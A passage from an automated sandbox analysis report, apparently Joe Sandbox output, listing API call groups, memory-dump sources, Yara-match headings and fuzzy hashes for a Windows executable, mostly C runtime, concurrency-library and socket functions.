                    • __Mtx_unlock.LIBCPMT ref: 0040E00D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlockrecv$closesocket
                    • String ID:
                    • API String ID: 1157980791-0
                    • Opcode ID: 158086d292d45c85abeaa5be95d92c8111d92be6de9e5fb1e3c020eabcfe630b
                    • Instruction ID: 64baf80f3dbcb208198eef45908f3a95639eba4967a2abd8c04065fd2e83b998
                    • Opcode Fuzzy Hash: 158086d292d45c85abeaa5be95d92c8111d92be6de9e5fb1e3c020eabcfe630b
                    • Instruction Fuzzy Hash: 6951C5B1D00205AFD7209F61CC46B96B7B5FF04304F1486BFE81AA72A2EB75AD54CB49
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 044F726A
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 044F72C4
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,044F717A,?,000000FF), ref: 044F7352
                    • __dosmaperr.LIBCMT ref: 044F7359
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 044F7396
                      • Part of subcall function 044F75BE: __dosmaperr.LIBCMT ref: 044F75F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 7c87e6b422b989ebc9d6e138182671ac8519fd9e257c21747869edc419deaa29
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 09413C75900704ABDF24DFB6DC459AFBBF9EF88300B14442EEA56D3610EB38A944CB61
                    APIs
                    • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00437003
                    • GetFileInformationByHandle.KERNEL32(?,?), ref: 0043705D
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00436F13,?,000000FF), ref: 004370EB
                    • __dosmaperr.LIBCMT ref: 004370F2
                    • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0043712F
                      • Part of subcall function 00437357: __dosmaperr.LIBCMT ref: 0043738C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                    • String ID:
                    • API String ID: 1206951868-0
                    • Opcode ID: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction ID: 86b53b091d5339d90dada3391adf114cdc1a48250b9c16bee365c924aaea3f03
                    • Opcode Fuzzy Hash: fd94452bb283925db15eed2e4757c18caa3077711e278af8bdb9b3e6b693ea09
                    • Instruction Fuzzy Hash: 6C414EB6904704ABDB389FA6DC459AFBBF9EF48300B10542EF596D3610E6389840CB55
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044EDEDC
                      • Part of subcall function 044E92A6: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 044E92C7
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 044EDF3B
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 044EDF61
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 044EDF81
                    • Concurrency::location::_Assign.LIBCMT ref: 044EDFCE
                      • Part of subcall function 044F16A7: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 044F16EC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: b56548f47f23d13120bb4924a002ff2d39b870d27b52277b991d62c531194cf4
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: B04101B4A00211ABDF1ADF26C885BBEBB66AF45319F14409FE4065B382DB30BD05CB91
                    APIs
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DC75
                      • Part of subcall function 0042903F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00429060
                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042DCD4
                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042DCFA
                    • Concurrency::details::SchedulerBase::ReleaseInternalContext.LIBCONCRT ref: 0042DD1A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042DD67
                      • Part of subcall function 00431440: Concurrency::details::ContextBase::AddStealer.LIBCONCRT ref: 00431485
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Context$Base::Concurrency::details::$Internal$Event$AssignBlockingConcurrency::location::_FindNestingPrepareReleaseSchedulerStealerThrowTraceWork
                    • String ID:
                    • API String ID: 1879022333-0
                    • Opcode ID: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction ID: 63ebb2224078d8bdd719b4d667a60a5c8aa541c12ffbf131e152555adb9a5383
                    • Opcode Fuzzy Hash: 5aea100d1611f03f1beea5e0fb550c94f5de7610d73f87ec00ff82fe4494aade
                    • Instruction Fuzzy Hash: 464126B0B00220ABDF19AB25E886BFEBB64AF45314F44409FE4065B382CF789D45C7D9
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 044DF064
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 044DF08E
                      • Part of subcall function 044DF754: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 044DF771
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 044DF10B
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 044DF13D
                    • __freea.LIBCMT ref: 044DF163
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__freea
                    • String ID:
                    • API String ID: 2497068736-0
                    • Opcode ID: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction ID: a7a02e0bf2b6661e372789cffd60aedec34049081f34aea16733a71e8e10fcec
                    • Opcode Fuzzy Hash: 64bc477ca6d0e7906eca2e494a79156161fd0f552174310835e686a0cf1359d2
                    • Instruction Fuzzy Hash: 05319071A002068BDF25DFA8C8605AEB7F5AF49314F25406FD506EB341DB74BD0ACB91
                    APIs
                    • _SpinWait.LIBCONCRT ref: 004287FE
                      • Part of subcall function 0041EBE0: _SpinWait.LIBCONCRT ref: 0041EBF8
                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428812
                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428844
                    • List.LIBCMT ref: 004288C7
                    • List.LIBCMT ref: 004288D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                    • String ID:
                    • API String ID: 3281396844-0
                    • Opcode ID: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction ID: 2a559f85231c331ddd4a9ce77051960e3928693ad3a01cc98d84397cd5210c7c
                    • Opcode Fuzzy Hash: d3379cffcb3624c0f7b3b6030f0d212e7c0603c93dc2e1288b36c8e06a519342
                    • Instruction Fuzzy Hash: 42318A32E02625DFCB14EFA5E5516EDB7B0BF14308F84406FD80127242DB396D04CB99
                    APIs
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044E7727
                    • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 044E7769
                    • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 044E7785
                    • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 044E7790
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 044E77B7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                    • String ID:
                    • API String ID: 3897347962-0
                    • Opcode ID: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction ID: aaf1b3485b76f6959a2f96a2d82a61053d4ef4a0aa1e3e807ff789e7140f1272
                    • Opcode Fuzzy Hash: 18d1e6f5588df1a187ef86af0e02b332a0a908ae4d907c5c7b9a669127731062
                    • Instruction Fuzzy Hash: 3C218238A00219AFDF14EF66C494ABE77B5BF04356F1440AAD901A73A2DB34BE05CF90
                    APIs
                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 0040DDDC
                    • freeaddrinfo.WS2_32(?), ref: 0040DDFD
                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040DE25
                    • connect.WS2_32(00000000,?,00000010), ref: 0040DE37
                    • closesocket.WS2_32(00000000), ref: 0040DE51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocketconnectfreeaddrinfogetaddrinfosocket
                    • String ID:
                    • API String ID: 1398928706-0
                    • Opcode ID: a5accd40e6fd03b943f41d8c5a4d16b4670171b9b0cc7d5845fa08d30ba69220
                    • Instruction ID: 5b0568097f643a62a94e7b1fa31eb2be6006fd059ff3750f04bf8a84844ce590
                    • Opcode Fuzzy Hash: a5accd40e6fd03b943f41d8c5a4d16b4670171b9b0cc7d5845fa08d30ba69220
                    • Instruction Fuzzy Hash: 2B2188B5E043145BDB249BA1DC4ABEE7368DF44305F0011BBF909A62C1D77DAD848B5A
                    APIs
                    • _free.LIBCMT ref: 044FF35C
                      • Part of subcall function 044FB0FC: HeapFree.KERNEL32(00000000,00000000,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?), ref: 044FB112
                      • Part of subcall function 044FB0FC: GetLastError.KERNEL32(?,?,044FF3D7,?,00000000,?,?,?,044FF3FE,?,00000007,?,?,044FF800,?,?), ref: 044FB124
                    • _free.LIBCMT ref: 044FF36E
                    • _free.LIBCMT ref: 044FF380
                    • _free.LIBCMT ref: 044FF392
                    • _free.LIBCMT ref: 044FF3A4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 5977bb728c406b8a87401bd8fda6c8761a142b9bfbf36aacaf5f76dac26e9311
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: 9BF04F32604A10FB9E30EB5AFE81C0B73D9EB01315355480BE618D7A20CFB0F8808655
                    APIs
                    • _free.LIBCMT ref: 0043F0F5
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F107
                    • _free.LIBCMT ref: 0043F119
                    • _free.LIBCMT ref: 0043F12B
                    • _free.LIBCMT ref: 0043F13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction ID: 20cc99717a647c86e6a84bdeed4021dc3f5e7d0ecd55b80566e61f4c1914feb2
                    • Opcode Fuzzy Hash: b7a06467977bbac8cfd489c50f4a7d094a08230f1997383846fcfae6058d8918
                    • Instruction Fuzzy Hash: EBF04432944710ABC925EB55FA82C0B73E9EA48314F68282FF058D7601DB7CFC44466D
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 00402806
                    • ___std_exception_destroy.LIBVCRUNTIME ref: 004028A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ___std_exception_copy___std_exception_destroy
                    • String ID: P#@$P#@
                    • API String ID: 2970364248-3974838576
                    • Opcode ID: 8e6f47f53b86a165781106739808f43370944a5e520a2672acda0c2ea3881d75
                    • Instruction ID: d07b1476e1c9369c34cdbbae878fc5af4d4488366f6001985d65a31c5cb34ac4
                    • Opcode Fuzzy Hash: 8e6f47f53b86a165781106739808f43370944a5e520a2672acda0c2ea3881d75
                    • Instruction Fuzzy Hash: D4719471E002089BDB04DF98C985BDDFBB4EF49314F14822EE815B7381D778A984CBA9
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: 55de151aeb2fb0dc7974fca46cb27e9be3a0863d867f7bc103b647dd28cd3375
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: 93613EB5E002199FDF24CFA9C8809EEFBF5EF48314B14816AD916E7340E735AE418B90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: *?
                    • API String ID: 269201875-2564092906
                    • Opcode ID: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction ID: a3f27f88263ce3e1505ace8c85f3ecc3a08bb576eb7af5fa0352c1f383531ab9
                    • Opcode Fuzzy Hash: e5011a25309ae06755606b4eb0abf58eb485cfb5f4646edeaebc0172359cf34e
                    • Instruction Fuzzy Hash: D4617BB1E002199FDB14CFA9D8815AEFBF5EF4C310F2591AAE805E7300D678AE418B94
                    APIs
                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 004427FC
                    • _free.LIBCMT ref: 004427EA
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 004429B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                    • String ID: XgE
                    • API String ID: 2155170405-2984570469
                    • Opcode ID: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction ID: 4144492f74be2ab261ac73441af81b9bed5bd636e8574888bf5b0065352f6d8b
                    • Opcode Fuzzy Hash: e6cff1b96d69b7330679c385eca8d8e9d46b42b402a043d23bc39838db8e0328
                    • Instruction Fuzzy Hash: 5F512971D00215ABEB10FF668E819AE77BCAF44354F5102AFF510E3291EBF89E418B59
                    APIs
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 044F4BF6
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 044F4CAA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 3480331319-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 8af0e493e7c357d8274c8a2459a425231cc12fca6f7ba45c7852ab9b9e629b18
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: B641E934A00248ABCF10DF69CC84A9FBBB4BF55328F158156EE145B352EB71F941CB91
                    APIs
                    • RtlEncodePointer.NTDLL(00000000), ref: 044F59F8
                    • CatchIt.LIBVCRUNTIME ref: 044F5ADE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: a19c344d53be4f7ae82a9c43bc920f84eb6026759bd4991fae0be753e92bd431
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: 70416871D00209FFDF15CF98CC80AEEBBB5BF48304F18815AFA14A6222D335A960DB50
                    APIs
                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00435791
                    • CatchIt.LIBVCRUNTIME ref: 00435877
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchEncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 1435073870-2084237596
                    • Opcode ID: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction ID: f89fec4cce6058aad9e99e0a1a778d616f5fcef55721b1fb97097d1a833b2b70
                    • Opcode Fuzzy Hash: 4632558cc9321f54eab00938dad1157866a20dbf75bad7f9ddfe9ee287866398
                    • Instruction Fuzzy Hash: C9417C71900609EFCF19EF94CD81AEEBBB5FF48304F14905AF90567251D3399A60DB94
                    APIs
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B53
                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00403B59
                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00403B62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_destroy_in_situ$Cnd_destroy_in_situ
                    • String ID: pB@
                    • API String ID: 3308344742-522444117
                    • Opcode ID: f17a27479b94ee524bee0745035b5a9fa0b6b924b3b87c51be5c751a629281f5
                    • Instruction ID: 9fa57e067fa2e57eae0d05727bcb9931675f6d872009e7436c3174976e3d59b0
                    • Opcode Fuzzy Hash: f17a27479b94ee524bee0745035b5a9fa0b6b924b3b87c51be5c751a629281f5
                    • Instruction Fuzzy Hash: 1F31E571600B009FD7248F29C889B66BBE9EF44725F04466EE95ACB391D73CED00CB94
                    APIs
                    • List.LIBCONCRT ref: 0042AFFA
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B01F
                    • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042B05E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                    • String ID: pExecutionResource
                    • API String ID: 1772865662-359481074
                    • Opcode ID: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction ID: b773aba9d63d3202b0a560684f2aba75f81d395c910e5e66aad4bd489bcccfa2
                    • Opcode Fuzzy Hash: 97894c26e78649899b86c153b2f2f2c3430a5959f8272080c60c93d73f9dd151
                    • Instruction Fuzzy Hash: 5F21B9B5B402159BCB08EF65C881BED77A1BF48304F50402FF90567392DBB8AE45CB99
                    APIs
                    • _free.LIBCMT ref: 04502BC7
                    • _free.LIBCMT ref: 04502C1D
                      • Part of subcall function 045029F9: _free.LIBCMT ref: 04502A51
                      • Part of subcall function 045029F9: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00456758), ref: 04502A63
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 6441d443f5a211a1e84640d481851bc996ae4ec302849a78cb35b14bec5ad1ce
                    • Instruction ID: c878fe14d37921fc769b39664816bdb01a63444dd9908dfb49818149e88af6e4
                    • Opcode Fuzzy Hash: 6441d443f5a211a1e84640d481851bc996ae4ec302849a78cb35b14bec5ad1ce
                    • Instruction Fuzzy Hash: F7216B3A90011577DB30AB259C49EEA7768FB81324F1042E6F994A30D0FF707D81A691
                    APIs
                    • SetEnvironmentVariableW.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00445052
                    • _free.LIBCMT ref: 00445061
                    • _free.LIBCMT ref: 00445070
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$EnvironmentVariable
                    • String ID: +C
                    • API String ID: 1464849758-2392048020
                    • Opcode ID: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction ID: baffdb16212c9a535461b980e853fd56a9b8a88738fd2a4de881e2530209dff9
                    • Opcode Fuzzy Hash: f677b73a37d78ac646d0ce1cbfd6812df92f093aa3150c3488a8ffb32704bfce
                    • Instruction Fuzzy Hash: 411130B1C01219AFDF11AFAA98816DEFFB8BF08314F54406FE414B2212D6384945CBA8
                    APIs
                    • Concurrency::details::SchedulerBase::Cleanup.LIBCONCRT ref: 00424A7E
                      • Part of subcall function 0042533F: Concurrency::details::SchedulingNode::~SchedulingNode.LIBCONCRT ref: 00425359
                      • Part of subcall function 0042533F: Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 004277D7
                      • Part of subcall function 0042533F: Concurrency::details::_UnregisterConcRTEventTracing.LIBCONCRT ref: 004277E9
                      • Part of subcall function 0042533F: InterlockedPopEntrySList.KERNEL32(00465B38,00000004,00448B40,000000FF), ref: 004277FF
                      • Part of subcall function 0041F517: DeleteCriticalSection.KERNEL32(?,0042BCC1,1F0F83C3,00000000,?,?,00000000,0044B50B,000000FF,?,0042069C), ref: 0041F518
                    • ~ListArray.LIBCONCRT ref: 00424AC0
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424920
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424929
                      • Part of subcall function 0042491B: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424AC5,1F0F83C3,?,?,?,00448B40,000000FF), ref: 00424932
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 0042493B
                      • Part of subcall function 0042491B: ListArray.LIBCONCRT ref: 00424945
                    • ~ListArray.LIBCONCRT ref: 00424AC8
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 0042499A
                      • Part of subcall function 00424995: ListArray.LIBCONCRT ref: 004249A3
                      • Part of subcall function 00424995: InterlockedFlushSList.KERNEL32(?,00000000,?,?,00424ACD,1F0F83C3,?,?,?,00448B40,000000FF), ref: 004249AC
